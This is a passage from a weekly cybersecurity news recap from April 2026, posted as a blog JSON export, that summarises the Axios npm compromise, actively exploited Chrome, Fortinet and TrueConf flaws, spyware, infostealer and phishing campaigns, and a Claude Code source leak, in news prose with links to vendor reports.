{"id":45160,"date":"2026-04-07T02:55:27","date_gmt":"2026-04-06T18:55:27","guid":{"rendered":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/2026\/04\/07\/weekly-recap-axios-hack-chrome-0-day-fortinet-exploits-paragon-spyware-and-more\/"},"modified":"2026-04-07T02:55:27","modified_gmt":"2026-04-06T18:55:27","slug":"weekly-recap-axios-hack-chrome-0-day-fortinet-exploits-paragon-spyware-and-more","status":"publish","type":"post","link":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/2026\/04\/07\/weekly-recap-axios-hack-chrome-0-day-fortinet-exploits-paragon-spyware-and-more\/","title":{"rendered":"&#9889; Weekly Recap: Axios Hack, Chrome 0-Day, Fortinet Exploits, Paragon Spyware and More"},"content":{"rendered":"<div style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiZyEpyaWHYHm8-TyNZQgYtoAqrsAUDZ0_onxgp1BUSV0khgAkwy7S9fMT75sRAm2blJXN6xw6i4r0fXP_hayN2Afrr7ul6egJc2nvFJUoWqmy0iJCr5JdK9-915pCFpEtRdlOMb-BYexGAPQPdKnGjWPbPlfGFx5qOo5Dhzfjes7_k-s5bYgFDEyMCT5BJ\/s1600\/recaps.jpg\" style=\"clear: left; display: block; float: left; padding: 1em 0px; text-align: center;\"><img decoding=\"async\" border=\"0\" data-original-height=\"470\" data-original-width=\"900\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiZyEpyaWHYHm8-TyNZQgYtoAqrsAUDZ0_onxgp1BUSV0khgAkwy7S9fMT75sRAm2blJXN6xw6i4r0fXP_hayN2Afrr7ul6egJc2nvFJUoWqmy0iJCr5JdK9-915pCFpEtRdlOMb-BYexGAPQPdKnGjWPbPlfGFx5qOo5Dhzfjes7_k-s5bYgFDEyMCT5BJ\/s1600\/recaps.jpg\" alt=\"&amp;#9889; Weekly Recap: Axios Hack, Chrome 0-Day, Fortinet Exploits, Paragon Spyware and More\" \/><\/a><\/div>\n<p>This&nbsp;week had real hits. The&nbsp;key software got tampered with. Active&nbsp;bugs showed up in the tools people use every day. Some&nbsp;attacks didn&#8217;t even need much effort because the path was already&nbsp;there.<\/p>\n<p>One weak spot now spreads wider than before. What&nbsp;starts small can reach a lot of systems fast. 
New&nbsp;bugs, faster use, less time to&nbsp;react.<\/p>\n<p>That&#8217;s this week. Read&nbsp;through&nbsp;it.<\/p>\n<h2 style=\"text-align: left;\"><strong>&#9889; Threat of the&nbsp;Week<\/strong><\/h2>\n<p><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/unc1069-social-engineering-of-axios.html\">Axios npm Package Compromised by N. Korean&nbsp;Hackers<\/a><\/strong>&#8212;Threat actors with ties to North Korea seized control of the npm account belonging to the lead maintainer of Axios, a popular npm package with nearly 100 million weekly downloads, to push malicious versions containing a cross-platform malware dubbed WAVESHAPER.V2. The&nbsp;activity has been attributed to a financially motivated threat actor known as UNC1069. The&nbsp;incident demonstrates how quickly the compromise of a popular npm package can have ripple effects through the ecosystem. The&nbsp;malware&#8217;s self-deleting anti-forensic cleanup points to a deliberate, planned operation. &#8220;The build pipeline is becoming the new front line. Attackers know that if they can compromise the systems that build and distribute software, they can inherit trust at scale,&#8221; Avital Harel, Security Researcher at Upwind, said. &#8220;That&#8217;s what makes these attacks so dangerous &#8212; they&#8217;re not just targeting one application, they&#8217;re targeting the process behind many of them. Organizations should be looking much more closely at CI\/CD systems, package dependencies, and developer environments, because that&#8217;s increasingly where attackers are placing their bets.&#8221; Ismael Valenzuela, vice president of Labs, Threat Research, and Intelligence at Arctic Wolf, said the Axios npm compromise reflects a broader trend where attackers infiltrate trusted, widely used software components to obtain access to downstream customers at scale. 
&#8220;Even though the malicious versions were available for only a few hours, Axios is so deeply embedded across enterprise applications that organizations may have unknowingly pulled the compromised code into their environments through build pipelines or downstream dependencies,&#8221; Valenzuela added. &#8220;That downstream exposure is what makes these incidents particularly difficult to spot and contain, especially for teams that never directly chose to install Axios themselves. This&nbsp;incident reinforces that security teams need to treat build&#8209;time tools and dependencies as part of the attack surface and not just trust tools by&nbsp;default.&#8221;<\/p>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udd14 Top&nbsp;News<\/strong><\/h2>\n<ul>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/new-chrome-zero-day-cve-2026-5281-under.html\">Google Patches Actively Exploited Chrome 0-Day<\/a><\/strong>&#8212;Google released security updates for its Chrome web browser to address 21 vulnerabilities, including a zero-day flaw that it said has been exploited in the wild. The&nbsp;high-severity vulnerability, CVE-2026-5281 (CVSS score: N\/A), concerns a use-after-free bug in Dawn, an open-source and cross-platform implementation of the WebGPU standard. Users&nbsp;are advised to update their Chrome browser to versions 146.0.7680.177\/178 for Windows and Apple macOS, and 146.0.7680.177&nbsp;for Linux. 
Google&nbsp;did not reveal how the vulnerability is being exploited or who is behind the exploitation effort.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/03\/trueconf-zero-day-exploited-in-attacks.html\">TrueConf 0-Day Exploited in Attacks Targeting Government Entities in Southeast Asia<\/a><\/strong>&#8212;Chinese hackers have exploited a zero-day vulnerability in the TrueConf video conferencing software in attacks against government entities in Southeast Asia. The&nbsp;exploited flaw, tracked as CVE-2026-3502 (CVSS score of 7.8), exists because the client fetches application update code without any integrity check, so an attacker who controls the update source can distribute a tampered update that the client runs as genuine. &#8220;The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update,&#8221; Check Point said. The&nbsp;activity, which began in January 2026, involved the deployment of the Havoc framework. Most&nbsp;infections likely began with a link sent to the victims. TrueConf is used widely across organizations in Asia, Europe, and the Americas, serving about 100,000 organizations globally.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/fortinet-patches-actively-exploited-cve.html\">Fortinet FortiClient EMS Flaw Under Attack<\/a><\/strong>&#8212;Fortinet released out-of-band patches for a critical security flaw impacting FortiClient EMS (CVE-2026-35616) that it said has been exploited in the wild. The&nbsp;vulnerability has been described as a pre-authentication API access bypass leading to privilege escalation. Exploitation attempts against CVE-2026-35616 were first recorded against watchTowr&#8217;s honeypots on March 31, 2026. 
The&nbsp;development comes days after another recently patched, critical vulnerability in FortiClient EMS (CVE-2026-21643) came under active exploitation.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/apple-expands-ios-1877-update-to-more.html\">Apple Backports DarkSword Fixes to More Devices<\/a><\/strong>&#8212;Apple expanded the availability of iOS 18.7.7&nbsp;and iPadOS 18.7.7&nbsp;to a broader range of devices to protect users from the risk posed by a recently disclosed exploit kit known as DarkSword. The&nbsp;update targets devices that are capable of upgrading to the newest operating system (iOS 26) but whose owners have chosen to remain on iOS 18. Shipping a fix to devices that could simply upgrade is an unprecedented step for Apple, and it underscores the level of threat that DarkSword poses. The&nbsp;large number of users still on iOS 18, combined with the leak of a new version of DarkSword on GitHub, pushed Apple to release the fix so that those users stay protected without updating to iOS 26. The&nbsp;leak is significant because it puts the exploit kit within reach of less technically savvy cybercriminals.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/03\/deepload-malware-uses-clickfix-and-wmi.html\">ClickFix Attack Leads to DeepLoad Malware<\/a><\/strong>&#8212;The ClickFix technique is being used to deliver a stealthy malware named DeepLoad that&#8217;s capable of stealing credentials and intercepting browser interactions. 
The&nbsp;malware first emerged on a dark web cybercrime forum in early February 2026, when a threat actor, using the alias &#8220;MysteryHack,&#8221; advertised it as a &#8220;centralized panel for multiple types of malware.&#8221; According to <a href=\"https:\/\/www.zerofox.com\/intelligence\/flash-report-cryptocurrency-stealer-for-sale-on-dark-web\/\">ZeroFox<\/a>, &#8220;DeepLoad&#8217;s design is explicitly focused on actively facilitating real-time cryptocurrency theft, which almost certainly makes it an attractive malware suite in the cybercrime-as-a-service (CaaS) environment.&#8221; The malware has since been distributed to Windows systems through ClickFix under the guise of resolving fake browser error messages. Besides stealing credentials, the malware drops a rogue browser extension to intercept sensitive data and spreads via removable USB drives. DeepLoad&#8217;s actual attack logic is buried under layers of obfuscation, raising the possibility that some parts of the malware were developed using an artificial intelligence (AI) model.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/claude-code-tleaked-via-npm-packaging.html\">Claude Code Source Code Leaks<\/a><\/strong>&#8212;Anthropic acknowledged that internal code for its popular artificial intelligence (AI) coding assistant, Claude Code, had been inadvertently released due to a human error. When Anthropic pushed out version 2.1.88&nbsp;of its Claude Code npm package, it accidentally included a source map (.map) file that exposed nearly 2,000 source code files and more than 512,000 lines of code. 
The&nbsp;<a href=\"https:\/\/github.com\/zackautocracy\/claude-code\">source code leak<\/a> has since <a href=\"https:\/\/ccleaks.com\/\">revealed<\/a> various features the company appears to be working on or that are built into the service, including an Undercover mode to hide AI authorship from contributions to public code repositories, a persistent background agent called KAIROS, measures to combat distillation attacks, and <a href=\"https:\/\/alex000kim.com\/posts\/2026-03-31-claude-code-source-leak\/#frustration-detection-via-regex-yes-regex\">active monitoring<\/a> of words and phrases that show signs of user frustration. The&nbsp;leak also quickly escalated into a cybersecurity threat, as attackers pounced on the surge in interest to lure developers into downloading stealer malware.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udd25 Trending&nbsp;CVEs<\/strong><\/h2>\n<p>New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. 
The&nbsp;flaws below are this week&#8217;s most critical &#8212; high-severity, widely used software, or already drawing attention from the security community.<\/p>\n<p>Check these first, patch what applies, and don&#8217;t wait on the ones marked urgent&nbsp;&#8212; <a href=\"https:\/\/thehackernews.com\/2026\/04\/fortinet-patches-actively-exploited-cve.html\">CVE-2026-35616<\/a> (Fortinet FortiClient&nbsp;EMS), <a href=\"https:\/\/thehackernews.com\/2026\/04\/cisco-patches-98-cvss-imc-and-ssm-flaws.html\">CVE-2026-20093<\/a> (Cisco Integrated Management Controller), <a href=\"https:\/\/thehackernews.com\/2026\/04\/cisco-patches-98-cvss-imc-and-ssm-flaws.html\">CVE-2026-20160<\/a> (Cisco Smart Software Manager&nbsp;On-Prem), <a href=\"https:\/\/thehackernews.com\/2026\/04\/new-chrome-zero-day-cve-2026-5281-under.html\">CVE-2026-5281<\/a> (Google&nbsp;Chrome), <a href=\"https:\/\/thehackernews.com\/2026\/03\/trueconf-zero-day-exploited-in-attacks.html\">CVE-2026-3502<\/a> (TrueConf), <a href=\"https:\/\/grafana.com\/blog\/grafana-security-release-critical-and-high-severity-security-fixes-for-cve-2026-27876-and-cve-2026-27880\/\">CVE-2026-27876, CVE-2026-27880<\/a> (Grafana), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/655822\">CVE-2026-4789<\/a> (Kyverno), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/221883\">CVE-2026-2275, CVE-2026-2285, CVE-2026-2286, CVE-2026-2287<\/a>&nbsp;(CrewAI), <a href=\"https:\/\/notepad-plus-plus.org\/news\/v893-released\/\">CVE-2025-14819<\/a> (Notepad++), <a href=\"https:\/\/github.com\/vim\/vim\/security\/advisories\/GHSA-2gmj-rpqf-pxvh\">CVE-2026-34714<\/a>, <a href=\"https:\/\/github.com\/vim\/vim\/security\/advisories\/GHSA-8h6p-m6gr-mpw9\">CVE-2026-34982<\/a>&nbsp;(<a href=\"https:\/\/blog.calif.io\/p\/mad-bugs-vim-vs-emacs-vs-claude\">Vim<\/a>), <a href=\"https:\/\/github.com\/n8n-io\/n8n\/security\/advisories\/GHSA-58qr-rcgv-642v\">CVE-2026-33660<\/a>, <a 
href=\"https:\/\/github.com\/n8n-io\/n8n\/security\/advisories\/GHSA-mxrg-77hm-89hv\">CVE-2026-33696<\/a>&nbsp;(n8n), <a href=\"https:\/\/github.com\/axios\/axios\/security\/advisories\/GHSA-43fc-jf86-j433\">CVE-2026-25639<\/a>&nbsp;(Axios), <a href=\"https:\/\/www.strongswan.org\/blog\/2026\/03\/23\/strongswan-vulnerability-(cve-2026-25075).html\">CVE-2026-25075<\/a>&nbsp;(<a href=\"https:\/\/bishopfox.com\/blog\/strongswan-cve-2026-25075-integer-underflow-in-vpn-authentication\">strongSwan<\/a>), <a href=\"https:\/\/github.com\/nocobase\/nocobase\/security\/advisories\/GHSA-px3p-vgh9-m57c\">CVE-2026-34156<\/a> (NocoBase), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/951662\">CVE-2026-3308<\/a> (Artifex&nbsp;MuPDF), <a href=\"https:\/\/www.cisa.gov\/news-events\/ics-advisories\/icsa-26-090-02\">CVE-2026-1579<\/a> (PX4 Autopilot), <a href=\"https:\/\/labs.infoguard.ch\/advisories\/cve-2026-3991_symantec-dlp-agent_local-privilege-escalation\/\">CVE-2026-3991<\/a> (Symantec Data Loss Prevention Agent for&nbsp;Windows), <a href=\"https:\/\/github.com\/0xJacky\/nginx-ui\/security\/advisories\/GHSA-fhh2-gg7w-gwpq\">CVE-2026-33026<\/a> (nginx-ui), <a href=\"https:\/\/github.com\/pnggroup\/libpng\/security\/advisories\/GHSA-m4pc-p4q3-4c7j\">CVE-2026-33416<\/a>, <a href=\"https:\/\/github.com\/pnggroup\/libpng\/security\/advisories\/GHSA-wjr5-c57x-95m2\">CVE-2026-33636<\/a>&nbsp;(libpng), <a href=\"https:\/\/www.foxit.com\/support\/security-bulletins.html\">CVE-2026-3775, CVE-2026-3779<\/a> (Foxit PDF&nbsp;Editor), <a href=\"https:\/\/heyitsas.im\/posts\/cups\/\">CVE-2026-34980, CVE-2026-34990<\/a> (CUPS),&nbsp;and <a href=\"https:\/\/www.tp-link.com\/us\/support\/faq\/5047\/\">CVE-2026-34121<\/a> (TP-Link).<\/p>\n<h2 style=\"text-align: left;\"><strong>\ud83c\udfa5 Cybersecurity&nbsp;Webinars<\/strong><\/h2>\n<ul>\n<li><a href=\"https:\/\/thehacker.news\/identity-maturity-2026?source=recap\">Learn How to Close Identity Gaps Using Insights from IT Leaders<\/a> &#8594; 
Identity programs face rising risk from disconnected apps, manual credentials, and expanding AI access. Based on 2026 insights from 600+ IT and security leaders, this session shows what to measure, fix, and do now to close identity gaps and regain control.<\/li>\n<li><a href=\"https:\/\/thehacker.news\/ghost-in-the-machine?source=recap\">Learn How to Build Secure AI Agents Using Identity, Visibility, and Control<\/a> &#8594; AI agents are already being used, but most teams don&#8217;t know how to secure them properly. This session shows a clear, practical way to do it using three key ideas: identity, visibility, and control. You will see what real deployment looks like, how to track what agents do, and how to manage their behavior safely. It also explains how to secure AI systems today without waiting for standards to settle.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udcf0 Around the Cyber&nbsp;World<\/strong><\/h2>\n<ul>\n<li><strong>Device Code Phishing Attacks Surge <\/strong>&#8212;<a href=\"https:\/\/thehackernews.com\/2026\/03\/device-code-phishing-hits-340-microsoft.html\">Device code phishing attacks<\/a>, which abuse the OAuth device authorization grant flow to hijack accounts, have surged more than 37.5x&nbsp;this year. Push&nbsp;Security said it detected a 15x increase in device code phishing pages at the start of March 2026, indicating that the technique has finally entered mainstream adoption. &#8220;The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly),&#8221; the company <a href=\"https:\/\/pushsecurity.com\/blog\/device-code-phishing\/\">said<\/a>. &#8220;Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. 
That&nbsp;said, Microsoft is, as always, much more heavily targeted at scale now than any other app.&#8221; The surge has been fueled by the emergence of EvilTokens (aka ANTIBOT), the first reported criminal PhaaS (Phishing-as-a-Service) toolkit that supports device code phishing. EvilTokens features a Cloudflare Workers frontend and a Railway backend for authentication. Early&nbsp;iterations of the PhaaS kit emerged in January 2026. Another closed-source PhaaS kit called Venom offers device code phishing capabilities similar to EvilTokens. Some&nbsp;of the other PhaaS kits that have incorporated this technique include SHAREFILE, CLURE, LINKID, AUTHOV, DOCUPOLL, FLOW_TOKEN, PAPRIKA, DCSTATUS, and DOLCE.<\/li>\n<li><strong>LinkedIn Comes Under Scanner for BrowserGate <\/strong>&#8212;A newly published report called BrowserGate alleged that Microsoft&#8217;s LinkedIn is using hidden JavaScript on its website to scan visitors&#8217; browsers for thousands of installed Google Chrome extensions and collect device data without users&#8217; consent. &#8220;LinkedIn scans for over 200 products that directly compete with its own sales tools, including Apollo, Lusha, and ZoomInfo,&#8221; the report <a href=\"https:\/\/browsergate.eu\/\">said<\/a>. &#8220;Because LinkedIn knows each user&#8217;s employer, it can map which companies use which competitor products. It&nbsp;is extracting the customer lists of thousands of software companies from their users&#8217; browsers without anyone&#8217;s knowledge. Then&nbsp;it uses what it finds. LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets.&#8221; The report also claimed LinkedIn loads an invisible tracking pixel from HUMAN Security, along with a separate fingerprinting script that runs from LinkedIn&#8217;s servers and a third script from Google that runs silently on every page load. 
In&nbsp;response to the findings, LinkedIn <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/linkedin-secretely-scans-for-6-000-plus-chrome-extensions-collects-data\/\">told<\/a> Bleeping Computer it scans for certain extensions that scrape data without members&#8217; consent in violation of its terms of service. The&nbsp;company also claimed the report is from an individual who is &#8220;subject to an account restriction for scraping and other violations of LinkedIn&#8217;s Terms of Service.&#8221;<\/li>\n<li><strong>ICE Confirms Use of Paragon Spyware <\/strong>&#8212;The U.S. Immigration and Customs Enforcement (ICE) <a href=\"https:\/\/cyberscoop.com\/ice-using-paragon-spyware-house-democrats-letter\/\">confirmed<\/a> it uses spyware developed by Paragon to &#8220;identify, disrupt, and dismantle Foreign Terrorist Organizations, addressing the escalating fentanyl epidemic and safeguarding national security.&#8221; Paragon&#8217;s Graphite spyware has been found on the phones of journalists. WhatsApp last year <a href=\"https:\/\/thehackernews.com\/2026\/04\/whatsapp-alerts-200-users-after-fake.html\">said<\/a> it disrupted a campaign that deployed the spyware against its users. The&nbsp;governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are <a href=\"https:\/\/thehackernews.com\/2025\/03\/six-governments-likely-use-israeli.html\">suspected<\/a> to be customers of the Israeli company.<\/li>\n<li><strong>Ex-Engineer Pleads Guilty to Extortion Campaign <\/strong>&#8212;Daniel Rhyne, 59, of Kansas City, Missouri, <a href=\"https:\/\/www.justice.gov\/usao-nj\/pr\/former-employee-national-industrial-company-pleads-guilty-crimes-related-hacking\">pleaded guilty<\/a> to a failed data extortion campaign that targeted his former employer. Rhyne&nbsp;was <a href=\"https:\/\/thehackernews.com\/2024\/09\/ex-engineer-charged-in-missouri-for.html\">arrested<\/a> in September 2024. 
According to court documents, Rhyne worked as a core infrastructure engineer at a U.S.-based industrial company headquartered in New Jersey. In&nbsp;November 2023, the defendant executed a ransomware attack against the company and sent an extortion email to its employees, threatening to continue shutting down the firm&#8217;s servers unless he was paid about 20 Bitcoin, which was valued at $750,000 at the time. Last&nbsp;month, the U.S. Justice Department (DoJ) announced the conviction of Cameron Curry (aka Loot), a 27-year-old from Charlotte, North Carolina, for carrying out a cyber extortion scheme against a D.C.-based international technology company called Brightly Software. &#8220;Trial evidence established that Curry misused his position to access the victim company&#8217;s personnel and other sensitive corporate records, which he then used to carry out the cyber extortion scheme after he learned that his contract was not going to be renewed and that he would no longer be employed by the company,&#8221; the DoJ <a href=\"https:\/\/www.justice.gov\/usao-dc\/pr\/north-carolina-man-convicted-cyber-extortion-scheme-targeted-dc-based-tech-company\">said<\/a>. Between December 11, 2023, and January 24, 2024, Curry sent more than 60 emails to company executives and employees, stating he would disclose sensitive information unless he was paid $2.5&nbsp;million in cryptocurrency. Brightly ended up paying $7,540 in Bitcoin.<\/li>\n<li><strong>Residential Proxies Bypass Reputation Systems <\/strong>&#8212;Threat intelligence firm GreyNoise&#8217;s analysis of 4 billion sessions targeting the edge over a 90-day period from November 29, 2025, to February 27, 2026, found that 39% of unique IP addresses targeting the edge originated from home internet connections, and that 78% vanish before any reputation system can flag them. 
&#8220;78% of residential IPs appear in only 1&#8211;2 sessions and are never observed again,&#8221; it <a href=\"https:\/\/www.greynoise.io\/blog\/invisible-army-why-ip-reputation-fails-against-rotation-economy\">said<\/a>. &#8220;IP reputation is structurally broken against residential proxies. The&nbsp;rotation rate exceeds the update cycle of any feed-based defense.&#8221; This behavior also makes source IPs indistinguishable from a legitimate user&#8217;s connection. The&nbsp;data also showed that 0.1% of residential sessions carry exploitation payloads, in contrast to 1.0% from hosting infrastructure, indicating that residential proxies are primarily used for network scanning and reconnaissance. The&nbsp;residential proxy traffic is generated by IoT botnets and infected computers, and the networks have proven resilient against takedown efforts. &#8220;After IPIDEA lost 40% of its nodes, operators backfilled within weeks,&#8221; GreyNoise said. &#8220;Every major takedown produces the same result &#8212; temporary disruption, then regeneration.&#8221; GreyNoise also recommended that &#8220;Detection must shift from &#8216;where is the traffic from?&#8217; to &#8216;what is the traffic doing?&#8217; Device fingerprinting provides more durable detection because fingerprints survive IP rotation.&#8221;<\/li>\n<li><strong>Suspected N. Korea&nbsp;Campaign Targets Cryptocurrency Companies Using React2Shell <\/strong>&#8212;A new campaign has been observed systematically compromising cryptocurrency organizations by exploiting web application vulnerabilities such as <a href=\"https:\/\/thehackernews.com\/2025\/12\/north-korea-linked-actors-exploit.html\">React2Shell<\/a> (CVE-2025-55182), pillaging AWS tenants with valid credentials, and exfiltrating proprietary exchange software containing hardcoded secrets. 
&#8220;Their targeting spans the crypto supply chain, from staking platforms, to exchange software providers, to the exchanges themselves,&#8221; Ctrl-Alt-Intel <a href=\"https:\/\/ctrlaltintel.com\/research\/DPRK-Crypto-Heist\/\">said<\/a>. The&nbsp;threat intelligence firm has assessed the activity with moderate confidence to be aligned with North Korean cryptocurrency theft operations.<\/li>\n<li><strong>India Extends SIM-Binding Mandate <\/strong>&#8212;The Indian government has extended the compliance deadline for its <a href=\"https:\/\/thehackernews.com\/2025\/12\/india-orders-messaging-apps-to-work.html\">SIM-binding mandate<\/a> to December 31, 2026, while shelving plans to require messaging apps to forcibly log out web-based sessions like WhatsApp Web every six hours. The&nbsp;decision <a href=\"https:\/\/www.thehindu.com\/sci-tech\/technology\/government-shelves-periodic-web-logout-for-chat-apps-extends-sim-binding-to-december-31\/article70811929.ece\">comes<\/a> after the Broadband India Forum, which represents Meta and Google, warned the Department of Telecommunications (DoT) that the directions were unconstitutional. Under&nbsp;the framework announced in November 2025, a messaging app account would be tied exclusively to the physical SIM card during registration. This&nbsp;meant that users could access messages and other content only while that SIM is present in the device. Companies were given 90 days (i.e., until the end of February 2026) to comply. While&nbsp;SIM binding has been proposed as a way to combat spammers and cross&#8209;border fraud, the move has raised feasibility and user experience concerns. 
According to Moneycontrol, WhatsApp is <a href=\"https:\/\/www.moneycontrol.com\/news\/business\/dot-extends-sim-binding-deadline-for-whatsapp-telegram-signal-to-year-end-13876716.html\">said<\/a> to be beta testing SIM binding on Android.<\/li>\n<li><strong>Russian Threat Actors Looking to Regain Access Through Compromised Infrastructure <\/strong>&#8212;Russian threat actors like APT28 and Void Blizzard are attempting to regain access to computer systems they previously compromised to check if access is still available and whether the obtained credentials remain valid, CERT-UA has warned. &#8220;Unfortunately, these attempts sometimes succeed if the root cause of the initial incident has not been completely eliminated,&#8221; the agency <a href=\"https:\/\/cip.gov.ua\/ua\/statics\/analitichni-materiali-derzhspeczv-yazku\">said<\/a>.<\/li>\n<li><strong>OkCupid Settles with FTC for Privacy Violations <\/strong>&#8212;OkCupid and its owner, Match Group, <a href=\"https:\/\/www.ftc.gov\/news-events\/news\/press-releases\/2026\/03\/ftc-takes-action-against-match-okcupid-deceiving-users-sharing-personal-data-third-party\">reached<\/a> a settlement with the U.S. Federal Trade Commission over allegations that it did not inform its customers that nearly three million user photos were shared with Clarifai, a company that develops AI systems to identify and analyze images and videos. The&nbsp;complaint also accused the dating site of sharing users&#8217; location information and other details without their consent. 
As&nbsp;part of the settlement, OkCupid and Match did not admit or deny the allegations but agreed to a permanent prohibition that prevents them from misrepresenting how they use and share personal data.<\/li>\n<li><strong>New Android Malware Mirax Advertised <\/strong>&#8212;A sophisticated new Android banking trojan named <a href=\"https:\/\/x.com\/KrakenLabs_Team\/status\/2029525839860163010\">Mirax<\/a> is being advertised as a private malware-as-a-service (MaaS) offering for up to $2,500 per month. The&nbsp;malware enables customers to gain remote control over devices and includes specialized overlays for more than 700 different financial applications to steal credentials and other sensitive information. It&nbsp;can also capture keystrokes, intercept SMS messages, record lock screen patterns, and use the infected device as a SOCKS5 proxy.<\/li>\n<li><strong>Venom Stealer Spreads via ClickFix <\/strong>&#8212;A new malware-as-a-service (MaaS) platform dubbed <a href=\"https:\/\/www.blackfog.com\/venom-stealer-turns-clickfix-into-a-full-exfiltration-pipeline\/\">Venom Stealer<\/a> is being sold on cybercrime forums as a subscription ($250\/month to $1,800 for lifetime access). It&#8217;s marketed as &#8220;the Apex Predator of Wallet Extraction.&#8221; Unlike other stealers, it automates credential theft and enables continuous data exfiltration. &#8220;It builds <a href=\"https:\/\/thehackernews.com\/2026\/02\/microsoft-discloses-dns-based-clickfix.html\">ClickFix<\/a> social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running,&#8221; BlackFog said. 
The&nbsp;development coincides with a new <a href=\"https:\/\/www.cyberproof.com\/blog\/the-clickfix-evolution-new-variant-replaces-powershell-with-rundll32-and-webdav\/\">ClickFix variant<\/a> that replaces PowerShell with a &#8220;rundll32.exe&#8221; command to download a DLL from an attacker-controlled WebDAV resource. The&nbsp;attack leads to the execution of a secondary loader called SkimokKeep, which then downloads additional payloads, while incorporating anti-sandboxing and anti-debugging mechanisms. In&nbsp;the meantime, <a href=\"https:\/\/mp.weixin.qq.com\/s\/0M1sZq1HqwAAaMbRDBEZEw\">recent ClickFix campaigns<\/a> have also leveraged searches for installation tutorials for OpenClaw, Claude, and other AI tools, as well as for common macOS issues to push stealer malware like <a href=\"https:\/\/thehackernews.com\/2026\/03\/clickfix-campaigns-spread-macsync-macos.html\">MacSync<\/a>.<\/li>\n<li><strong>More Information Stealers Spotted <\/strong>&#8212;Speaking of stealers, recent campaigns have also been observed using procurement-themed email lures and fake Homebrew install guides served via sponsored search results to deliver <a href=\"https:\/\/www.group-ib.com\/blog\/phantom-stealer-credential-theft\/\">Phantom Stealer<\/a> and <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-03-31-SHub-Stealer-Activity.txt\">SHub Stealer<\/a>. Some&nbsp;other newly discovered infostealer malware families include <a href=\"https:\/\/www.varonis.com\/blog\/storm-infostealer\">Storm<\/a>, <a href=\"https:\/\/www.levelblue.com\/blogs\/spiderlabs-blog\/say-my-name-how-miolab-is-building-macos-stealer-empire\">MioLab<\/a>, and <a href=\"https:\/\/www.gendigital.com\/blog\/insights\/research\/torg-grabber-credential-stealer-analysis\">Torg Grabber<\/a>. 
In&nbsp;a related development, CyberProof <a href=\"https:\/\/www.cyberproof.com\/blog\/a-deep-dive-into-pxa-stealer\/\">said<\/a> it observed a surge in <a href=\"https:\/\/thehackernews.com\/2026\/02\/microsoft-warns-python-infostealers.html\">PXA Stealer<\/a> activity targeting global financial institutions during Q1 2026. Another malware that has <a href=\"https:\/\/www.splunk.com\/en_us\/blog\/security\/blankgrabber-trojan-stealer-analysis-detection.html\">gained notoriety<\/a> is BlankGrabber, which is distributed through social engineering and phishing campaigns. Data&nbsp;gathered by Flare <a href=\"https:\/\/flare.io\/learn\/resources\/blog\/victim-profiling-stealer-malware\">shows<\/a> that a single stealer log can be devastating, with individual logs containing up to 1,381 pieces of personally identifiable information. In&nbsp;an analysis published by Whiteintel last month, the company found that a single careless download of cracked software by one employee can hand criminal groups direct access to an entire corporate network in under two days. &#8220;An employee downloads cracked software on Tuesday afternoon,&#8221; it <a href=\"https:\/\/whiteintel.io\/blog\/infostealer-lifecycle-48-hours\">said<\/a>. &#8220;By Thursday morning, their credentials are listed on the Russian Market for $15. Corporate VPN access, AWS credentials, session tokens that bypass MFA &#8211; all packaged and ready for purchase.&#8221;<\/li>\n<li><strong>Phishing Campaign Targets Philippine Banking Users <\/strong>&#8212;An ongoing phishing campaign targeting major banks in the Philippines is using email phishing via compromised accounts as the initial vector to harvest online banking credentials and one-time passwords (OTPs) for financial fraud. According to Group-IB, the campaign began in early 2024, distributing over 900 malicious links as part of the coordinated scheme. 
Clicking on the link embedded in the email message triggers a redirection chain that uses trusted services like Google Business, AMP CDN, Cloudflare Workers, and URL shorteners before taking the victims to the final landing page. &#8220;The campaign enables real-time financial fraud by bypassing MFA mechanisms through the theft of valid One-Time Passwords (OTP), allowing attackers to perform unauthorized fund transfers,&#8221; the company <a href=\"https:\/\/www.group-ib.com\/blog\/phisles-phishing-banks-philippines\/\">said<\/a>. &#8220;Telegram bots were used as exfiltration channels, enabling threat actors to automatically collect victims&#8217; login information in real time.&#8221; The activity has been attributed to a threat group called PHISLES.<\/li>\n<li><strong>Chrome Extension Harvests ChatGPT Conversations <\/strong>&#8212;A malicious Chrome extension, named &#8220;ChatGPT Ad Blocker&#8221; (ID: ipmmidjikiklckbngllogmggoofbhjikgb), found on the Chrome Web Store masquerades as an ad-blocking tool for the AI chatbot, but contains functionality to &#8220;steal the user&#8217;s ChatGPT conversations data by systematically copying the HTML page and sending it to a webhook on a private Discord channel,&#8221; DomainTools <a href=\"https:\/\/dti.domaintools.com\/securitysnacks\/securitysnack-openai-anti-ads-malware\">said<\/a>.<\/li>\n<li><strong>Iran Conflict Triggers Espionage Activity in Middle East <\/strong>&#8212;In the aftermath of the U.S.-Israel-Iran conflict, 